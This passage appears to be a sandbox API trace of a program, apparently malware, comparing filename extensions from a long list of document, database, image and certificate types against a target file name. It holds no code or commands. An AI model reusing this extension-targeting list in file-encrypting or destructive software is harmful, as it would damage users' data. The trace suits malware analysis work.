(lpString=".1cd") returned 4 [0033.305] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".3ds") returned 4 [0033.305] lstrcmpiW (lpString1=".3ds", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".3fr") returned 4 [0033.305] lstrcmpiW (lpString1=".3fr", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".3g2") returned 4 [0033.305] lstrcmpiW (lpString1=".3g2", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".3gp") returned 4 [0033.305] lstrcmpiW (lpString1=".3gp", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".7z") returned 3 [0033.305] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0033.305] lstrlenW (lpString=".accda") returned 6 [0033.305] lstrcmpiW (lpString1=".accda", lpString2="UI.msi") returned -1 [0033.305] lstrlenW (lpString=".accdb") returned 6 [0033.305] lstrcmpiW (lpString1=".accdb", lpString2="UI.msi") returned -1 [0033.305] lstrlenW (lpString=".accdc") returned 6 [0033.305] lstrcmpiW (lpString1=".accdc", lpString2="UI.msi") returned -1 [0033.305] lstrlenW (lpString=".accde") returned 6 [0033.305] lstrcmpiW (lpString1=".accde", lpString2="UI.msi") returned -1 [0033.305] lstrlenW (lpString=".accdt") returned 6 [0033.305] lstrcmpiW (lpString1=".accdt", lpString2="UI.msi") returned -1 [0033.305] lstrlenW (lpString=".accdw") returned 6 [0033.305] lstrcmpiW (lpString1=".accdw", lpString2="UI.msi") returned -1 [0033.305] lstrlenW (lpString=".adb") returned 4 [0033.305] lstrcmpiW (lpString1=".adb", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".adp") returned 4 [0033.305] lstrcmpiW (lpString1=".adp", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".ai") returned 3 [0033.305] lstrcmpiW (lpString1=".ai", lpString2="msi") returned -1 [0033.305] lstrlenW (lpString=".ai3") returned 4 [0033.305] lstrcmpiW (lpString1=".ai3", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".ai4") returned 4 [0033.305] lstrcmpiW (lpString1=".ai4", lpString2=".msi") returned -1 [0033.305] lstrlenW (lpString=".ai5") returned 4 [0033.305] lstrcmpiW (lpString1=".ai5", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".ai6") returned 4 [0033.306] lstrcmpiW (lpString1=".ai6", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".ai7") returned 4 [0033.306] lstrcmpiW (lpString1=".ai7", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".ai8") returned 4 [0033.306] lstrcmpiW (lpString1=".ai8", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".anim") returned 5 [0033.306] lstrcmpiW (lpString1=".anim", lpString2="I.msi") returned -1 [0033.306] lstrlenW (lpString=".arw") returned 4 [0033.306] lstrcmpiW (lpString1=".arw", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".as") returned 3 [0033.306] lstrcmpiW (lpString1=".as", lpString2="msi") returned -1 [0033.306] lstrlenW (lpString=".asa") returned 4 [0033.306] lstrcmpiW (lpString1=".asa", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".asc") returned 4 [0033.306] lstrcmpiW (lpString1=".asc", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".ascx") returned 5 [0033.306] lstrcmpiW (lpString1=".ascx", lpString2="I.msi") returned -1 [0033.306] lstrlenW (lpString=".asm") returned 4 [0033.306] lstrcmpiW (lpString1=".asm", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".asmx") returned 5 [0033.306] lstrcmpiW (lpString1=".asmx", lpString2="I.msi") returned -1 [0033.306] lstrlenW (lpString=".asp") returned 4 [0033.306] lstrcmpiW (lpString1=".asp", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".aspx") returned 5 [0033.306] lstrcmpiW (lpString1=".aspx", lpString2="I.msi") returned -1 [0033.306] lstrlenW (lpString=".asr") returned 4 [0033.306] lstrcmpiW (lpString1=".asr", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".asx") returned 4 [0033.306] lstrcmpiW (lpString1=".asx", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".avi") returned 4 [0033.306] lstrcmpiW (lpString1=".avi", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".avs") returned 4 [0033.306] lstrcmpiW (lpString1=".avs", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".backup") returned 7 [0033.306] lstrcmpiW (lpString1=".backup", lpString2="MUI.msi") returned -1 [0033.306] lstrlenW (lpString=".bak") returned 4 [0033.306] lstrcmpiW (lpString1=".bak", lpString2=".msi") returned -1 [0033.306] lstrlenW (lpString=".bay") returned 4 [0033.306] lstrcmpiW (lpString1=".bay", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".bd") returned 3 [0033.307] lstrcmpiW (lpString1=".bd", lpString2="msi") returned -1 [0033.307] lstrlenW (lpString=".bin") returned 4 [0033.307] lstrcmpiW (lpString1=".bin", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".bmp") returned 4 [0033.307] lstrcmpiW (lpString1=".bmp", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".bz2") returned 4 [0033.307] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".c") returned 2 [0033.307] lstrcmpiW (lpString1=".c", lpString2="si") returned -1 [0033.307] lstrlenW (lpString=".cdr") returned 4 [0033.307] lstrcmpiW (lpString1=".cdr", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".cer") returned 4 [0033.307] lstrcmpiW (lpString1=".cer", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".cf") returned 3 [0033.307] lstrcmpiW (lpString1=".cf", lpString2="msi") returned -1 [0033.307] lstrlenW (lpString=".cfc") returned 4 [0033.307] lstrcmpiW (lpString1=".cfc", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".cfm") returned 4 [0033.307] lstrcmpiW (lpString1=".cfm", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".cfml") returned 5 [0033.307] lstrcmpiW (lpString1=".cfml", lpString2="I.msi") returned -1 [0033.307] lstrlenW (lpString=".cfu") returned 4 [0033.307] lstrcmpiW (lpString1=".cfu", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".chm") returned 4 [0033.307] lstrcmpiW (lpString1=".chm", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".cin") returned 4 [0033.307] lstrcmpiW (lpString1=".cin", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".class") returned 6 [0033.307] lstrcmpiW (lpString1=".class", lpString2="UI.msi") returned -1 [0033.307] lstrlenW (lpString=".clx") returned 4 [0033.307] lstrcmpiW (lpString1=".clx", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".config") returned 7 [0033.307] lstrcmpiW (lpString1=".config", lpString2="MUI.msi") returned -1 [0033.307] lstrlenW (lpString=".cpp") returned 4 [0033.307] lstrcmpiW (lpString1=".cpp", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".cr2") returned 4 [0033.307] lstrcmpiW (lpString1=".cr2", lpString2=".msi") returned -1 [0033.307] lstrlenW (lpString=".crt") returned 4 [0033.308] lstrcmpiW (lpString1=".crt", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".crw") returned 4 [0033.308] lstrcmpiW (lpString1=".crw", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".cs") returned 3 [0033.308] lstrcmpiW (lpString1=".cs", lpString2="msi") returned -1 [0033.308] lstrlenW (lpString=".css") returned 4 [0033.308] lstrcmpiW (lpString1=".css", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".csv") returned 4 [0033.308] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".cub") returned 4 [0033.308] lstrcmpiW (lpString1=".cub", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dae") returned 4 [0033.308] lstrcmpiW (lpString1=".dae", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dat") returned 4 [0033.308] lstrcmpiW (lpString1=".dat", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".db") returned 3 [0033.308] lstrcmpiW (lpString1=".db", lpString2="msi") returned -1 [0033.308] lstrlenW (lpString=".dbf") returned 4 [0033.308] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dbx") returned 4 [0033.308] lstrcmpiW (lpString1=".dbx", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dc3") returned 4 [0033.308] lstrcmpiW (lpString1=".dc3", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dcm") returned 4 [0033.308] lstrcmpiW (lpString1=".dcm", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dcr") returned 4 [0033.308] lstrcmpiW (lpString1=".dcr", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".der") returned 4 [0033.308] lstrcmpiW (lpString1=".der", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dib") returned 4 [0033.308] lstrcmpiW (lpString1=".dib", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dic") returned 4 [0033.308] lstrcmpiW (lpString1=".dic", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".dif") returned 4 [0033.308] lstrcmpiW (lpString1=".dif", lpString2=".msi") returned -1 [0033.308] lstrlenW (lpString=".divx") returned 5 [0033.308] lstrcmpiW (lpString1=".divx", lpString2="I.msi") returned -1 [0033.308] lstrlenW (lpString=".djvu") returned 5 [0033.308] lstrcmpiW (lpString1=".djvu", lpString2="I.msi") returned -1 [0033.309] lstrlenW (lpString=".dng") returned 4 [0033.309] lstrcmpiW (lpString1=".dng", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".doc") returned 4 [0033.309] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".docm") returned 5 [0033.309] lstrcmpiW (lpString1=".docm", lpString2="I.msi") returned -1 [0033.309] lstrlenW (lpString=".docx") returned 5 [0033.309] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0033.309] lstrlenW (lpString=".dot") returned 4 [0033.309] lstrcmpiW (lpString1=".dot", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".dotm") returned 5 [0033.309] lstrcmpiW (lpString1=".dotm", lpString2="I.msi") returned -1 [0033.309] lstrlenW (lpString=".dotx") returned 5 [0033.309] lstrcmpiW (lpString1=".dotx", lpString2="I.msi") returned -1 [0033.309] lstrlenW (lpString=".dpx") returned 4 [0033.309] lstrcmpiW (lpString1=".dpx", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".dqy") returned 4 [0033.309] lstrcmpiW (lpString1=".dqy", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".dsn") returned 4 [0033.309] lstrcmpiW (lpString1=".dsn", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".dt") returned 3 [0033.309] lstrcmpiW (lpString1=".dt", lpString2="msi") returned -1 [0033.309] lstrlenW (lpString=".dtd") returned 4 [0033.309] lstrcmpiW (lpString1=".dtd", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".dwg") returned 4 [0033.309] lstrcmpiW (lpString1=".dwg", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".dwt") returned 4 [0033.309] lstrcmpiW (lpString1=".dwt", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".dx") returned 3 [0033.309] lstrcmpiW (lpString1=".dx", lpString2="msi") returned -1 [0033.309] lstrlenW (lpString=".dxf") returned 4 [0033.309] lstrcmpiW (lpString1=".dxf", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".edml") returned 5 [0033.309] lstrcmpiW (lpString1=".edml", lpString2="I.msi") returned -1 [0033.309] lstrlenW (lpString=".efd") returned 4 [0033.309] lstrcmpiW (lpString1=".efd", lpString2=".msi") returned -1 [0033.309] lstrlenW (lpString=".elf") returned 4 [0033.310] lstrcmpiW (lpString1=".elf", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".emf") returned 4 [0033.310] lstrcmpiW (lpString1=".emf", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".emz") returned 4 [0033.310] lstrcmpiW (lpString1=".emz", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".epf") returned 4 [0033.310] lstrcmpiW (lpString1=".epf", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".eps") returned 4 [0033.310] lstrcmpiW (lpString1=".eps", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".epsf") returned 5 [0033.310] lstrcmpiW (lpString1=".epsf", lpString2="I.msi") returned -1 [0033.310] lstrlenW (lpString=".epsp") returned 5 [0033.310] lstrcmpiW (lpString1=".epsp", lpString2="I.msi") returned -1 [0033.310] lstrlenW (lpString=".erf") returned 4 [0033.310] lstrcmpiW (lpString1=".erf", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".exr") returned 4 [0033.310] lstrcmpiW (lpString1=".exr", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".f4v") returned 4 [0033.310] lstrcmpiW (lpString1=".f4v", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".fido") returned 5 [0033.310] lstrcmpiW (lpString1=".fido", lpString2="I.msi") returned -1 [0033.310] lstrlenW (lpString=".flm") returned 4 [0033.310] lstrcmpiW (lpString1=".flm", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".flv") returned 4 [0033.310] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".frm") returned 4 [0033.310] lstrcmpiW (lpString1=".frm", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".fxg") returned 4 [0033.310] lstrcmpiW (lpString1=".fxg", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".geo") returned 4 [0033.310] lstrcmpiW (lpString1=".geo", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".gif") returned 4 [0033.310] lstrcmpiW (lpString1=".gif", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".grs") returned 4 [0033.310] lstrcmpiW (lpString1=".grs", lpString2=".msi") returned -1 [0033.310] lstrlenW (lpString=".gz") returned 3 [0033.310] lstrcmpiW (lpString1=".gz", lpString2="msi") returned -1 [0033.310] lstrlenW (lpString=".h") returned 2 [0033.310] lstrcmpiW (lpString1=".h", lpString2="si") returned -1 [0033.310] lstrlenW (lpString=".hdr") returned 4 [0033.311] lstrcmpiW (lpString1=".hdr", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".hpp") returned 4 [0033.311] lstrcmpiW (lpString1=".hpp", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".hta") returned 4 [0033.311] lstrcmpiW (lpString1=".hta", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".htc") returned 4 [0033.311] lstrcmpiW (lpString1=".htc", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".htm") returned 4 [0033.311] lstrcmpiW (lpString1=".htm", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".html") returned 5 [0033.311] lstrcmpiW (lpString1=".html", lpString2="I.msi") returned -1 [0033.311] lstrlenW (lpString=".icb") returned 4 [0033.311] lstrcmpiW (lpString1=".icb", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".ics") returned 4 [0033.311] lstrcmpiW (lpString1=".ics", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".iff") returned 4 [0033.311] lstrcmpiW (lpString1=".iff", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".inc") returned 4 [0033.311] lstrcmpiW (lpString1=".inc", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".indd") returned 5 [0033.311] lstrcmpiW (lpString1=".indd", lpString2="I.msi") returned -1 [0033.311] lstrlenW (lpString=".ini") returned 4 [0033.311] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".iqy") returned 4 [0033.311] lstrcmpiW (lpString1=".iqy", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".j2c") returned 4 [0033.311] lstrcmpiW (lpString1=".j2c", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".j2k") returned 4 [0033.311] lstrcmpiW (lpString1=".j2k", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".java") returned 5 [0033.311] lstrcmpiW (lpString1=".java", lpString2="I.msi") returned -1 [0033.311] lstrlenW (lpString=".jp2") returned 4 [0033.311] lstrcmpiW (lpString1=".jp2", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".jpc") returned 4 [0033.311] lstrcmpiW (lpString1=".jpc", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".jpe") returned 4 [0033.311] lstrcmpiW (lpString1=".jpe", lpString2=".msi") returned -1 [0033.311] lstrlenW (lpString=".jpeg") returned 5 [0033.311] lstrcmpiW (lpString1=".jpeg", lpString2="I.msi") returned -1 [0033.311] lstrlenW (lpString=".jpf") returned 4 [0033.312] lstrcmpiW (lpString1=".jpf", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".jpg") returned 4 [0033.312] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".jpx") returned 4 [0033.312] lstrcmpiW (lpString1=".jpx", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".js") returned 3 [0033.312] lstrcmpiW (lpString1=".js", lpString2="msi") returned -1 [0033.312] lstrlenW (lpString=".jsf") returned 4 [0033.312] lstrcmpiW (lpString1=".jsf", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".json") returned 5 [0033.312] lstrcmpiW (lpString1=".json", lpString2="I.msi") returned -1 [0033.312] lstrlenW (lpString=".jsp") returned 4 [0033.312] lstrcmpiW (lpString1=".jsp", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".kdc") returned 4 [0033.312] lstrcmpiW (lpString1=".kdc", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".kmz") returned 4 [0033.312] lstrcmpiW (lpString1=".kmz", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".kwm") returned 4 [0033.312] lstrcmpiW (lpString1=".kwm", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".lasso") returned 6 [0033.312] lstrcmpiW (lpString1=".lasso", lpString2="UI.msi") returned -1 [0033.312] lstrlenW (lpString=".lbi") returned 4 [0033.312] lstrcmpiW (lpString1=".lbi", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".lgf") returned 4 [0033.312] lstrcmpiW (lpString1=".lgf", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".lgp") returned 4 [0033.312] lstrcmpiW (lpString1=".lgp", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".log") returned 4 [0033.312] lstrcmpiW (lpString1=".log", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".m1v") returned 4 [0033.312] lstrcmpiW (lpString1=".m1v", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".m4a") returned 4 [0033.312] lstrcmpiW (lpString1=".m4a", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".m4v") returned 4 [0033.312] lstrcmpiW (lpString1=".m4v", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".max") returned 4 [0033.312] lstrcmpiW (lpString1=".max", lpString2=".msi") returned -1 [0033.312] lstrlenW (lpString=".md") returned 3 [0033.312] lstrcmpiW (lpString1=".md", lpString2="msi") returned -1 [0033.313] lstrlenW (lpString=".mda") returned 4 [0033.313] lstrcmpiW (lpString1=".mda", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mdb") returned 4 [0033.313] lstrcmpiW (lpString1=".mdb", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mde") returned 4 [0033.313] lstrcmpiW (lpString1=".mde", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mdf") returned 4 [0033.313] lstrcmpiW (lpString1=".mdf", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mdw") returned 4 [0033.313] lstrcmpiW (lpString1=".mdw", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mef") returned 4 [0033.313] lstrcmpiW (lpString1=".mef", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mft") returned 4 [0033.313] lstrcmpiW (lpString1=".mft", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mfw") returned 4 [0033.313] lstrcmpiW (lpString1=".mfw", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mht") returned 4 [0033.313] lstrcmpiW (lpString1=".mht", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mhtml") returned 6 [0033.313] lstrcmpiW (lpString1=".mhtml", lpString2="UI.msi") returned -1 [0033.313] lstrlenW (lpString=".mka") returned 4 [0033.313] lstrcmpiW (lpString1=".mka", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mkidx") returned 6 [0033.313] lstrcmpiW (lpString1=".mkidx", lpString2="UI.msi") returned -1 [0033.313] lstrlenW (lpString=".mkv") returned 4 [0033.313] lstrcmpiW (lpString1=".mkv", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mos") returned 4 [0033.313] lstrcmpiW (lpString1=".mos", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mov") returned 4 [0033.313] lstrcmpiW (lpString1=".mov", lpString2=".msi") returned -1 [0033.313] lstrlenW (lpString=".mp3") returned 4 [0033.314] lstrcmpiW (lpString1=".mp3", lpString2=".msi") returned -1 [0033.314] lstrlenW (lpString=".mp4") returned 4 [0033.314] lstrcmpiW (lpString1=".mp4", lpString2=".msi") returned -1 [0033.314] lstrlenW (lpString=".mpeg") returned 5 [0033.314] lstrcmpiW (lpString1=".mpeg", lpString2="I.msi") returned -1 [0033.314] lstrlenW (lpString=".mpg") returned 4 [0033.314] lstrcmpiW (lpString1=".mpg", lpString2=".msi") returned -1 [0033.314] lstrlenW (lpString=".mpv") returned 4 [0033.314] lstrcmpiW (lpString1=".mpv", lpString2=".msi") returned -1 [0033.314] lstrlenW (lpString=".mrw") returned 4 [0033.314] lstrcmpiW (lpString1=".mrw", lpString2=".msi") returned -1 [0033.314] lstrlenW (lpString=".msg") returned 4 [0033.314] lstrcmpiW (lpString1=".msg", lpString2=".msi") returned -1 [0033.314] lstrlenW (lpString=".mxl") returned 4 [0033.314] lstrcmpiW (lpString1=".mxl", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".myd") returned 4 [0033.314] lstrcmpiW (lpString1=".myd", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".myi") returned 4 [0033.314] lstrcmpiW (lpString1=".myi", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".nef") returned 4 [0033.314] lstrcmpiW (lpString1=".nef", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".nrw") returned 4 [0033.314] lstrcmpiW (lpString1=".nrw", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".obj") returned 4 [0033.314] lstrcmpiW (lpString1=".obj", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".odb") returned 4 [0033.314] lstrcmpiW (lpString1=".odb", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".odc") returned 4 [0033.314] lstrcmpiW (lpString1=".odc", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".odm") returned 4 [0033.314] lstrcmpiW (lpString1=".odm", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".odp") returned 4 [0033.314] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".ods") returned 4 [0033.314] lstrcmpiW (lpString1=".ods", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".oft") returned 4 [0033.314] lstrcmpiW (lpString1=".oft", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".one") returned 4 [0033.314] lstrcmpiW (lpString1=".one", lpString2=".msi") returned 1 [0033.314] lstrlenW (lpString=".onepkg") returned 7 [0033.315] lstrcmpiW (lpString1=".onepkg", lpString2="MUI.msi") returned -1 [0033.315] lstrlenW (lpString=".onetoc2") returned 8 [0033.315] lstrcmpiW (lpString1=".onetoc2", lpString2="sMUI.msi") returned -1 [0033.315] lstrlenW (lpString=".opt") returned 4 [0033.315] lstrcmpiW (lpString1=".opt", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".oqy") returned 4 [0033.315] lstrcmpiW (lpString1=".oqy", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".orf") returned 4 [0033.315] lstrcmpiW (lpString1=".orf", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".p12") returned 4 [0033.315] lstrcmpiW (lpString1=".p12", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".p7b") returned 4 [0033.315] lstrcmpiW (lpString1=".p7b", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".p7c") returned 4 [0033.315] lstrcmpiW (lpString1=".p7c", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pam") returned 4 [0033.315] lstrcmpiW (lpString1=".pam", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pbm") returned 4 [0033.315] lstrcmpiW (lpString1=".pbm", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pct") returned 4 [0033.315] lstrcmpiW (lpString1=".pct", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pcx") returned 4 [0033.315] lstrcmpiW (lpString1=".pcx", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pdd") returned 4 [0033.315] lstrcmpiW (lpString1=".pdd", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pdf") returned 4 [0033.315] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pdp") returned 4 [0033.315] lstrcmpiW (lpString1=".pdp", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pef") returned 4 [0033.315] lstrcmpiW (lpString1=".pef", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pem") returned 4 [0033.315] lstrcmpiW (lpString1=".pem", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pff") returned 4 [0033.315] lstrcmpiW (lpString1=".pff", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pfm") returned 4 [0033.315] lstrcmpiW (lpString1=".pfm", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pfx") returned 4 [0033.315] lstrcmpiW (lpString1=".pfx", lpString2=".msi") returned 1 [0033.315] lstrlenW (lpString=".pgm") returned 4 [0033.316] lstrcmpiW (lpString1=".pgm", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".php") returned 4 [0033.316] lstrcmpiW (lpString1=".php", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".php3") returned 5 [0033.316] lstrcmpiW (lpString1=".php3", lpString2="I.msi") returned -1 [0033.316] lstrlenW (lpString=".php4") returned 5 [0033.316] lstrcmpiW (lpString1=".php4", lpString2="I.msi") returned -1 [0033.316] lstrlenW (lpString=".php5") returned 5 [0033.316] lstrcmpiW (lpString1=".php5", lpString2="I.msi") returned -1 [0033.316] lstrlenW (lpString=".phtml") returned 6 [0033.316] lstrcmpiW (lpString1=".phtml", lpString2="UI.msi") returned -1 [0033.316] lstrlenW (lpString=".pict") returned 5 [0033.316] lstrcmpiW (lpString1=".pict", lpString2="I.msi") returned -1 [0033.316] lstrlenW (lpString=".pl") returned 3 [0033.316] lstrcmpiW (lpString1=".pl", lpString2="msi") returned -1 [0033.316] lstrlenW (lpString=".pls") returned 4 [0033.316] lstrcmpiW (lpString1=".pls", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".pm") returned 3 [0033.316] lstrcmpiW (lpString1=".pm", lpString2="msi") returned -1 [0033.316] lstrlenW (lpString=".png") returned 4 [0033.316] lstrcmpiW (lpString1=".png", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".pnm") returned 4 [0033.316] lstrcmpiW (lpString1=".pnm", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".pot") returned 4 [0033.316] lstrcmpiW (lpString1=".pot", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".potm") returned 5 [0033.316] lstrcmpiW (lpString1=".potm", lpString2="I.msi") returned -1 [0033.316] lstrlenW (lpString=".potx") returned 5 [0033.316] lstrcmpiW (lpString1=".potx", lpString2="I.msi") returned -1 [0033.316] lstrlenW (lpString=".ppa") returned 4 [0033.316] lstrcmpiW (lpString1=".ppa", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".ppam") returned 5 [0033.316] lstrcmpiW (lpString1=".ppam", lpString2="I.msi") returned -1 [0033.316] lstrlenW (lpString=".ppm") returned 4 [0033.316] lstrcmpiW (lpString1=".ppm", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".pps") returned 4 [0033.316] lstrcmpiW (lpString1=".pps", lpString2=".msi") returned 1 [0033.316] lstrlenW (lpString=".ppsm") returned 5 [0033.317] lstrcmpiW (lpString1=".ppsm", lpString2="I.msi") returned -1 [0033.317] lstrlenW (lpString=".ppt") returned 4 [0033.317] lstrcmpiW (lpString1=".ppt", 